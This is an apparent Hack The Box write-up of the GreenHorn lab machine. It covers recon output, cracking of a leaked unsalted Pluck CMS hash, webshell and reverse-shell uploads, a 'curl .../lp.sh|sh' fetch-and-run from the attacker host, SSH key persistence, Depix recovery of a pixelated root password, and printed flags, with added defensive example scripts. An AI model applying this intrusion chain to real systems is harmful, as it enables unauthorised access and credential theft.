GreenHorn

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.25:22
Open 10.10.11.25:80
Open 10.10.11.25:3000
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.10.11.25
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-27 10:48 UTC
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 10:48
Completed Parallel DNS resolution of 1 host. at 10:48, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:48
Scanning 10.10.11.25 [3 ports]
Discovered open port 22/tcp on 10.10.11.25
Discovered open port 80/tcp on 10.10.11.25
Discovered open port 3000/tcp on 10.10.11.25
Completed Connect Scan at 10:48, 0.08s elapsed (3 total ports)
Initiating Service scan at 10:48
Scanning 3 services on 10.10.11.25
Completed Service scan at 10:49, 89.61s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.11.25.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 2.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 1.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 0.00s elapsed
Nmap scan report for 10.10.11.25
Host is up, received user-set (0.080s latency).
Scanned at 2024-07-27 10:48:08 UTC for 93s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 57d6928a7244841729eb5cc9636afefd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOp+cK9ugCW282Gw6Rqe+Yz+5fOGcZzYi8cmlGmFdFAjI1347tnkKumDGK1qJnJ1hj68bmzOONz/x1CMeZjnKMw=
|   256 40ea17b1b6c53f4256674a3cee75232f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEZQbCc8u6r2CVboxEesTZTMmZnMuEidK9zNjkD2RGEv
80/tcp   open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://greenhorn.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  ppp?    syn-ack
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=990489ab98123f7b; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=fwFi5uwa3lU9ZQXtWqC1OnPyCmQ6MTcyMjA3NzI5NTIxNDAyMzcxNg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 10:48:15 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=87a3c177f411b5cf; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=_NxYdqAX8yPx9AhcIdBo6_J5BCE6MTcyMjA3NzMwMDczOTY4OTg4Mw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 10:48:20 GMT
|_    Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.42 seconds
└─$ grep green /etc/hosts
10.10.11.25     greenhorn.htb

HTTP (80) [Enumeration]

Writeup.png

Access to /data/modules is denied, and to get into the CMS we need the admin password...

LFI is blocked because ../ is filtered, and there is nothing interesting reachable without the password.

Enumerate files/directories:

└─$ feroxbuster -u http://greenhorn.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,txt
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://greenhorn.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
...
200      GET        1l        4w       48c http://greenhorn.htb/data/index.html
200      GET        1l        4w       51c http://greenhorn.htb/data/inc/index.html
200      GET        1l        4w       54c http://greenhorn.htb/data/inc/lib/index.html
200      GET        1l        5w       27c http://greenhorn.htb/data/themes/default/license.txt
200      GET        1l       12w    16118c http://greenhorn.htb/data/image/favicon.ico
200      GET        2l       26w      149c http://greenhorn.htb/docs/update.php
200      GET        2l     5449w   363860c http://greenhorn.htb/data/modules/tinymce/tinymce.min.js
200      GET        3l        6w       47c http://greenhorn.htb/robots.txt
200      GET       19l       36w      295c http://greenhorn.htb/data/themes/.htaccess
200      GET       19l       36w      295c http://greenhorn.htb/images/.htaccess
200      GET       19l       38w      321c http://greenhorn.htb/files/.htaccess
200      GET       20l       38w      322c http://greenhorn.htb/data/trash/files/.htaccess
200      GET       31l      103w     1242c http://greenhorn.htb/login.php
200      GET       41l      266w     1811c http://greenhorn.htb/docs/README
200      GET      124l      384w     4417c http://greenhorn.htb/install.php
200      GET      124l      388w     4408c http://greenhorn.htb/admin.php
200      GET      452l      799w     7310c http://greenhorn.htb/data/styleadmin.css
200      GET      504l     4372w    26441c http://greenhorn.htb/data/modules/tinymce/license.txt
200      GET     1474l    20676w   138844c http://greenhorn.htb/data/modules/tinymce/changelog.txt
403      GET        7l       10w      162c http://greenhorn.htb/data/image/
403      GET        7l       10w      162c http://greenhorn.htb/data/modules/
403      GET        7l       10w      162c http://greenhorn.htb/data/modules/tinymce/
...
[####################] - 6m    326274/326274  0s      found:12196   errors:446
[####################] - 2m     14184/14184   98/s    http://greenhorn.htb/
[####################] - 2m     14184/14184   99/s    http://greenhorn.htb/data/
[####################] - 2m     14184/14184   98/s    http://greenhorn.htb/docs/
[####################] - 3m     14184/14184   87/s    http://greenhorn.htb/data/image/
[####################] - 3m     14184/14184   86/s    http://greenhorn.htb/data/modules/
[####################] - 3m     14184/14184   86/s    http://greenhorn.htb/data/modules/tinymce/
[####################] - 3m     14184/14184   79/s    http://greenhorn.htb/data/modules/albums/
[####################] - 3m     14184/14184   77/s    http://greenhorn.htb/data/modules/blog/
[####################] - 3m     14184/14184   76/s    http://greenhorn.htb/files/
[####################] - 3m     14184/14184   74/s    http://greenhorn.htb/images/
[####################] - 3m     14184/14184   77/s    http://greenhorn.htb/data/inc/
[####################] - 3m     14184/14184   75/s    http://greenhorn.htb/data/image/menu/
[####################] - 3m     14184/14184   76/s    http://greenhorn.htb/data/settings/
[####################] - 3m     14184/14184   69/s    http://greenhorn.htb/data/themes/
[####################] - 3m     14184/14184   71/s    http://greenhorn.htb/data/trash/
[####################] - 3m     14184/14184   71/s    http://greenhorn.htb/data/inc/lang/
[####################] - 3m     14184/14184   71/s    http://greenhorn.htb/data/inc/lib/
[####################] - 3m     14184/14184   78/s    http://greenhorn.htb/data/themes/default/
[####################] - 3m     14184/14184   81/s    http://greenhorn.htb/data/trash/files/
[####################] - 3m     14184/14184   85/s    http://greenhorn.htb/data/trash/images/
[####################] - 3m     14184/14184   87/s    http://greenhorn.htb/data/settings/modules/
[####################] - 3m     14184/14184   91/s    http://greenhorn.htb/data/settings/pages/
[####################] - 2m     14184/14184   101/s   http://greenhorn.htb/data/trash/pages/

DNS enumeration also returned nothing.

Gitea (3000)

There's a Gitea instance running on port 3000.

Writeup-1.png

On the register page we can register with OpenID, and by the looks of it the server is able to make outbound requests:

Writeup-2.png

The source of the web app on port 80 is published in a repository on the Gitea instance:

Writeup-3.png
└─$ git clone http://greenhorn.htb:3000/GreenAdmin/GreenHorn.git
└─$ cd GreenHorn
└─$ grep 'password' . -Rain | grep -vE 'js|/lang/'
./data/inc/functions.admin.php:356: * Hashes and saves login password.
./data/inc/functions.admin.php:360: * @param string $password The password (plain text).
./data/inc/functions.admin.php:362:function save_password($password) {
./data/inc/functions.admin.php:363:     //MD5-hash password
./data/inc/functions.admin.php:364:     $password = hash('sha512', $password);
./data/inc/functions.admin.php:365:     //Save password
./data/inc/functions.admin.php:366:     save_file('data/settings/pass.php', array('ww' => $password));
./data/inc/changepass.php:19:   //Include old password.
./data/inc/changepass.php:22:   //SHA512-encrypt posted passwords.
./data/inc/changepass.php:26:   //Check if the old password entered is correct. If it isnt, do:
./data/inc/changepass.php:36:   //If the old password entered is correct, save it.
./data/inc/changepass.php:38:                   save_password($cont2);
./data/inc/changepass.php:59:           <input name="cont1" id="cont1" type="password"/>
./data/inc/changepass.php:63:           <input name="cont2" id="cont2" type="password" />
./data/inc/changepass.php:67:           <input name="cont3" id="cont3" type="password" />
./data/inc/options.php:28:showmenudiv($lang['changepass']['title'], $lang['options']['pass_descr'], 'data/image/password.png', '?action=changepass');
./data/inc/header.php:151:                                      'img'  => 'data/image/password.png',
grep: (standard input): binary file matches
└─$ cat data/settings/pass.php
<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?> 
Writeup-4.png
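
Worth spelling out what the grep output above shows: save_password() runs hash('sha512', $password) (the comment still says MD5) and writes the bare hex digest to data/settings/pass.php, with no salt and no work factor, and that file sits in a public repository. The script below is an added example, not Pluck's code: it parses a pass.php body, checks a candidate list against the digest exactly the way the CMS would compute it, and contrasts that with a salted, slow hash. GREENHORN_WW is the digest copied from the pass.php above; SAMPLE_PASS_PHP and the wordlist are constructed for the demo.

```python
"""Unsalted SHA-512 as stored by Pluck versus a salted, slow KDF.

Added example, not Pluck's own code. pluck_hash() reproduces what
save_password() computes; everything else is the checker and the contrast.
"""
import hashlib
import hmac
import os
import re

# Digest copied from the writeup's data/settings/pass.php (split over two lines).
GREENHORN_WW = ("d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d7704"
                "86743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163")


def extract_digest(pass_php):
    """Pull the $ww hex digest out of a pass.php body."""
    m = re.search(r"\$ww\s*=\s*'([0-9a-f]{128})'", pass_php)
    if not m:
        raise ValueError("no SHA-512 digest in pass.php")
    return m.group(1)


def pluck_hash(password):
    """What save_password() computes: PHP hash('sha512', $password), lowercase hex."""
    return hashlib.sha512(password.encode()).hexdigest()


def check_candidates(digest, candidates):
    """Return the first candidate whose unsalted SHA-512 equals digest, else None."""
    for pw in candidates:
        if hmac.compare_digest(pluck_hash(pw), digest):
            return pw
    return None


ITERATIONS = 210_000  # work factor chosen for the example; tune for your hardware


def salted_hash(password, salt=None):
    """Salted, slow alternative: PBKDF2-HMAC-SHA512 with a random 16-byte salt."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + dk.hex()


def verify_salted(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed pass.php in the same format as the one cloned from Gitea, holding
# the digest of a constructed sample password rather than the box's.
SAMPLE_PASS_PHP = "<?php\n$ww = '%s';\n?>\n" % pluck_hash("correct horse")

if __name__ == "__main__":
    wordlist = ["password", "admin", "iloveyou1"]  # constructed, tiny
    sample = extract_digest(SAMPLE_PASS_PHP)
    print("sample pass.php ->", check_candidates(sample, ["password", "correct horse"]))
    print("writeup digest  ->", check_candidates(GREENHORN_WW, wordlist))
    a, b = salted_hash("correct horse"), salted_hash("correct horse")
    print("salted hashes differ:", a != b, "| verify:", verify_salted("correct horse", a))
```

The point of the contrast: two salted hashes of the same password differ, so a leaked digest cannot be precomputed against or matched across users, and each guess costs ITERATIONS of HMAC instead of one SHA-512.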

HTTP (80) [Exploitation]

Now that we can log in, we can upload files to the server through the module installer:

Options > Manage modules > Install modules

Writeup-5.png
└─$ cp /opt/scripts/shells/p0wny-shell/shell.php .
└─$ zip -r shell.zip shell.php
  adding: shell.php (deflated 76%)

Access the webshell:

Writeup-6.png

Ugh... as usual, HTB runs a cron job that deletes anything uploaded within a minute.

So just upload a reverse shell directly and catch the connection:

└─$ zip -r rev.zip php-reverse-shell.php
  adding: php-reverse-shell.php (deflated 59%)

Reverse Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

I wanted a database connection string that might leak a password, but Pluck CMS does not use a database:

└─$ grep 'sql' . -Rain | grep -vE 'js|/lang/'
./requirements.php:98:          'text'  => '<strong>magic_quotes_gpc</strong> is turned on. pluck does not use MySQL, so it should be turned off for performance reasons.',

A database service does seem to be listening locally, though:

www-data@greenhorn:/home/junior$ ss -tulnp
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp   UNCONN 0      0      127.0.0.53%lo:53        0.0.0.0:*
udp   UNCONN 0      0            0.0.0.0:68        0.0.0.0:*
tcp   LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*
tcp   LISTEN 0      511          0.0.0.0:80        0.0.0.0:*    users:(("nginx",pid=4141,fd=6),("nginx",pid=4140,fd=6))
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*
tcp   LISTEN 0      4096   127.0.0.53%lo:53        0.0.0.0:*
tcp   LISTEN 0      4096               *:3000            *:*
tcp   LISTEN 0      128             [::]:22           [::]:*

Enumerate the system with linpeas:

www-data@greenhorn:/dev/shm$ curl 10.10.14.37/lp.sh|sh|tee lp.log
...
                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
...
git         1108  0.5  4.4 2354588 178252 ?      Ssl  09:20   0:41 /usr/local/bin/gitea web --config /etc/gitea/app.ini
root        1113  0.0  0.0   6896  2904 ?        Ss   09:20   0:00 /usr/sbin/cron -f -P
root        1117  0.0  0.1  10348  4044 ?        S    09:20   0:00  _ /usr/sbin/CRON -f -P
root        1125  0.0  0.0   2892  1000 ?        Ss   09:20   0:00      _ /bin/sh -c /root/restart.sh
root        1126  0.0  0.0   7496  3680 ?        S    09:20   0:01          _ /bin/bash /root/restart.sh
root       13161  0.0  0.0   5772  1000 ?        S    11:22   0:00              _ /usr/bin/sleep 10 
...
mysql       1172  0.1  2.7 1541800 109312 ?      Ssl  09:20   0:10 /usr/sbin/mariadbd
  └─(Caps) 0x0000000020004002=cap_dac_override,cap_ipc_lock,cap_audit_write
root        4139  0.0  0.0  55228  1712 ?        Ss   10:15   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data    4140  0.5  0.2  58248  9180 ?        S    10:15   0:22  _ nginx: worker process
www-data    4141  0.8  0.2  57852  8772 ?        S    10:15   0:33  _ nginx: worker process
junior      8228  0.0  0.2  17096  9428 ?        Ss   10:53   0:00 /lib/systemd/systemd --user
junior      8229  0.0  0.0 103512  3668 ?        S    10:53   0:00  _ (sd-pam)

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
1.4M -rwxr-xr-x 1 root   root   1.4M Mar 14 11:31 /bin/bash
   0 lrwxrwxrwx 1 root   root      4 Mar 23  2022 /bin/sh -> dash
...
132M -rwxrwxrwx 1 junior junior 132M Apr 16 03:44 /usr/local/bin/gitea
...
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/gitea.service is calling this writable executable: /usr/local/bin/gitea
/etc/systemd/system/multi-user.target.wants/gitea.service is calling this writable executable: /usr/local/bin/gitea
/etc/systemd/system/multi-user.target.wants/grub-common.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/systemd-networkd.service could be executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service could be executing some relative path
You cant write on systemd PATH
...
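
The linpeas finding above deserves a closer look: /usr/local/bin/gitea is mode 0777 and owned by junior, yet gitea.service runs it as a system service. A unit whose executable can be rewritten by a less privileged account hands that account the service's privileges on the next restart. The script below is an added example (not linpeas code) that performs the same check directly: it reads a unit file, pulls the Exec* targets, and reports any that are not root-owned or are group/world-writable. The unit and binary in the demo are constructed in a temp dir.

```python
"""Audit systemd unit files for Exec* executables that non-root users can modify.

Added example, not linpeas's code. The demo at the bottom builds a unit like
gitea.service pointing at a 0777 binary, both constructed in a temp directory.
"""
import os
import re
import stat
import tempfile

# Exec* directives, allowing systemd's special prefixes (-, @, :, +, !, !!).
EXEC_RE = re.compile(
    r"^Exec(?:Start|StartPre|StartPost|Reload|Stop|StopPost)\s*=\s*[-@:+!]*(\S+)",
    re.MULTILINE,
)


def exec_targets(unit_text):
    """Executables named by Exec* directives in a unit file body."""
    return EXEC_RE.findall(unit_text)


def mode_problems(st_mode, st_uid):
    """Problems with an executable's on-disk mode/owner, as a list of strings."""
    problems = []
    if st_uid != 0:
        problems.append("owned by uid %d, not root" % st_uid)
    if st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    if st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems


def audit_unit(unit_path):
    """Map each Exec* executable in the unit to its problems (only those that have any)."""
    with open(unit_path) as fh:
        text = fh.read()
    findings = {}
    for exe in exec_targets(text):
        try:
            st = os.stat(exe)
        except FileNotFoundError:
            findings[exe] = ["missing"]
            continue
        problems = mode_problems(st.st_mode, st.st_uid)
        if problems:
            findings[exe] = problems
    return findings


if __name__ == "__main__":
    # Constructed demo: a unit pointing at a world-writable binary in a temp dir.
    with tempfile.TemporaryDirectory() as d:
        exe = os.path.join(d, "gitea")
        with open(exe, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(exe, 0o777)
        unit = os.path.join(d, "gitea.service")
        with open(unit, "w") as fh:
            fh.write("[Service]\nUser=git\nExecStart=%s web --config /etc/gitea/app.ini\n" % exe)
        for path, problems in audit_unit(unit).items():
            print("%s: %s -> %s" % (unit, path, ", ".join(problems)))
```

Run it over /etc/systemd/system/*.service on a host you administer; the fix for a hit like the one here is chown root:root and chmod 755 on the binary, and the same check is worth extending to the directory that contains it, since a writable parent directory allows the file to be replaced outright.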

We are unable to read the Gitea config file; only root and the git group can access it.

www-data@greenhorn:/dev/shm$ cat /etc/gitea/app.ini
cat: /etc/gitea/app.ini: Permission denied
www-data@greenhorn:/dev/shm$ ls -alhd /etc/gitea/
drwxrwx--- 2 root git 4.0K Jun 20 06:36 /etc/gitea/

Anyway, nothing of real interest so far without the junior user.

SSH

Privilege Escalation (junior)

Using the password we found in Pluck CMS we can log in as junior!

www-data@greenhorn:/dev/shm$ su - junior
Password: iloveyou1
junior@greenhorn:~$
---
└─$ ssh junior@greenhorn.htb
junior@greenhorn.htb: Permission denied (publickey).

SSH doesn't allow login via password.

└─$ ssh-keygen -f id_rsa
Generating public/private ed25519 key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:caUM9RIew6Maxdah5LZ6LquNJkbQZz+xrUp+gAxquTg woyag@kraken
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ5/HEwZN0ztb1G+B9PtxxKSzOv3Kk1J/L5jO0DBA07E woyag@kraken
---
junior@greenhorn:~/.ssh$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ5/HEwZN0ztb1G+B9PtxxKSzOv3Kk1J/L5jO0DBA07E woyag@kraken' >> /home/junior/.ssh/authorized_keys
---
└─$ ssh junior@greenhorn.htb -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jul 27 01:26:16 PM UTC 2024

  System load:  0.0               Processes:             253
  Usage of /:   71.6% of 3.45GB   Users logged in:       1
  Memory usage: 22%               IPv4 address for eth0: 10.10.11.25
  Swap usage:   0%


This system is built by the Bento project by Chef Software
More information can be found at https://github.com/chef/bento
Last login: Sat Jul 27 11:03:21 2024 from 10.10.14.154
junior@greenhorn:~$

User.txt

junior@greenhorn:~$ cat user.txt
f4b0a4affecc320188460a037558f9ae

Privilege Escalation (root)

junior@greenhorn:~$ python3 -m http.server 4444
---
└─$ curl greenhorn.htb:4444/openvas.pdf -sO
└─$ curl 'greenhorn.htb:4444/Using%20OpenVAS.pdf' -sO

The two PDF files seem to be identical:

└─$ diff openvas.pdf Using%20OpenVAS.pdf
Writeup-7.png

The password is a pixelated image, and no PDF manipulation will uncover it, but we can extract the image and try to reverse the pixelation.

This New Tool Can Retrieve Pixelated Text from Redacted Documents

Dan Petro, a lead researcher at offensive security firm Bishop Fox, has demonstrated a new open-source tool called Unredacter to reconstruct text from the pixelated images, effectively leaking the very information that was meant to be protected. The tool is also seen as an improvement over an existing utility named Depix, which works by looking up what permutations of pixels could have resulted in certain pixelated blocks to recover the text.

The article above introduces a tool called Unredacter; the official Bishop Fox post is titled "Never, Ever, Ever Use Pixelation for Redacting Text".

I was not able to get any valid results with that project, so I resorted to the Depix tool.

➜ py depix.py -p ..\openvas.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o output.png
output.png

Most of the text is somewhat readable now!
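
Why this works at all is worth a small model. Pixelation is a box filter: each block of the output is the average of the pixels underneath it. That is deterministic and, for a known font at a known size and grid, the pixelated form of every glyph can be precomputed and the filter inverted by lookup, which is the idea behind Depix's search images. The toy below is an added example, not Depix's or Unredacter's code: a constructed 7-letter font of 4x4 bitmaps, a 2x2 box filter, and the lookup inverse. It also shows where the "somewhat readable" comes from (two glyphs that collide stay ambiguous) and why a solid box is different (every glyph maps to the same output, so nothing can be recovered).

```python
"""Why pixelation is not redaction: a constructed toy model.

Not Depix's or Unredacter's code. Each glyph of a made-up 7-letter font is a
4x4 bitmap; pixelate() is a 2x2 box filter (per block, the count of set
pixels, which is the block average up to scaling); candidates() inverts any
transform by table lookup over the known font.
"""
from itertools import product

BLOCK = 2

# Constructed 4x4 glyphs; not a real font.
FONT = {
    "e": ["0110", "1111", "1000", "0110"],
    "i": ["0100", "0000", "0100", "0100"],
    "l": ["0100", "0100", "0100", "0110"],
    "o": ["0110", "1001", "1001", "0110"],
    "t": ["0100", "1110", "0100", "0110"],
    "v": ["1001", "1001", "0110", "0110"],
    "y": ["1001", "0110", "0100", "1000"],
}


def pixelate(bitmap, block=BLOCK):
    """Box-filter pixelation: for each block (row-major), the number of set pixels."""
    n = len(bitmap)
    return tuple(
        sum(bitmap[r][c] == "1"
            for r in range(br, br + block) for c in range(bc, bc + block))
        for br in range(0, n, block) for bc in range(0, n, block)
    )


def redact(bitmap, block=BLOCK):
    """Solid-box redaction: the output does not depend on the glyph at all."""
    n = len(bitmap)
    return tuple(0 for _ in range((n // block) ** 2))


def candidates(observed, transform, font=FONT):
    """Invert `transform` on a sequence of transformed glyphs by table lookup.

    Returns every string whose glyph-by-glyph transform equals `observed`.
    """
    table = {}
    for ch, bitmap in font.items():
        table.setdefault(transform(bitmap), []).append(ch)
    per_position = [sorted(table.get(sig, [])) for sig in observed]
    return ["".join(chars) for chars in product(*per_position)]


def recover(word, transform):
    """Apply `transform` to each glyph of `word`, then list every consistent word."""
    observed = [transform(FONT[ch]) for ch in word]
    return candidates(observed, transform)


if __name__ == "__main__":
    # 'o' and 'v' collide under the 2x2 filter, so two positions stay ambiguous.
    print("pixelated 'love' ->", recover("love", pixelate))
    print("redacted  'love' ->", len(recover("love", redact)), "candidates (the whole 7^4 space)")
```

Real documents make the lookup harder (anti-aliasing, unknown offsets, JPEG noise), which is what Depix's De Bruijn search images and Unredacter's brute force deal with, but they do not change the principle: the only redaction that removes information is one that replaces the region with content independent of the original.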

junior@greenhorn:~$ su
Password: sidefromsidetheothersidesidefromsidetheotherside

root@greenhorn:/home/junior# cd
cd
root@greenhorn:~# ls -alh
ls -alh
total 44K
drwx------  5 root root 4.0K Jul 27 16:18 .
drwxr-xr-x 20 root root 4.0K Jun 20 07:06 ..
lrwxrwxrwx  1 root root    9 Jun 11 14:42 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Oct 15  2021 .bashrc
drwx------  2 root root 4.0K Jun 20 06:36 .cache
-rwxr-xr-x  1 root root  250 Jun 19 17:06 cleanup.sh
drwxr-xr-x  3 root root 4.0K Jun 20 06:36 .local
lrwxrwxrwx  1 root root    9 Jun 20 05:44 .mysql_history -> /dev/null
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rwxr-xr-x  1 root root  962 Jul 18 13:01 restart.sh
-rw-r-----  1 root root   33 Jul 27 16:18 root.txt
-rw-r--r--  1 root root   66 Jul 18 12:59 .selected_editor
drwx------  2 root root 4.0K Jun 20 06:36 .ssh

Root.txt

root@greenhorn:~# cat root.txt
978b78ae10d821ec830fa9b167e87d13

Root Scripts

root@greenhorn:~# cat restart.sh
#!/bin/bash

# Define the target URL
url="http://greenhorn.htb/?file=welcome-to-greenhorn"

# Infinite loop
while true; do

    # Sleep for 10 seconds
    /usr/bin/sleep 10

    # Perform the curl request and check for the text "Failed to daemonise."
    response=$(/usr/bin/curl -s "$url")

    if echo "$response" | /usr/bin/grep -q "Failed to daemonise."; then
        # Suppress grep and rm output
        /usr/bin/grep -rl "Failed to daemonise." /var/www/html/pluck/data/modules | /usr/bin/xargs /usr/bin/rm -f >/dev/null 2>&1
    fi

    # Check the HTTP status code of the URL with a timeout of 10 seconds
    status_code=$(/usr/bin/curl -s -o /dev/null -w "%{http_code}" --max-time 10 "$url")

    if [ "$status_code" -ne 200 ]; then
        # Print message and restart nginx service
        echo "HTTP status code is $status_code or the request timed out. Restarting nginx service."
        /usr/bin/systemctl restart nginx
    fi
done >/dev/null 2>&1

root@greenhorn:~# cat cleanup.sh
#!/bin/bash

TARGET_DIR="/var/www/html/pluck/data/modules/"

# Find and delete directories modified in the last 3 minutes, excluding the target directory itself
find "$TARGET_DIR" -maxdepth 1 -mmin -3 -type d ! -path "$TARGET_DIR" -exec rm -rf {} \;
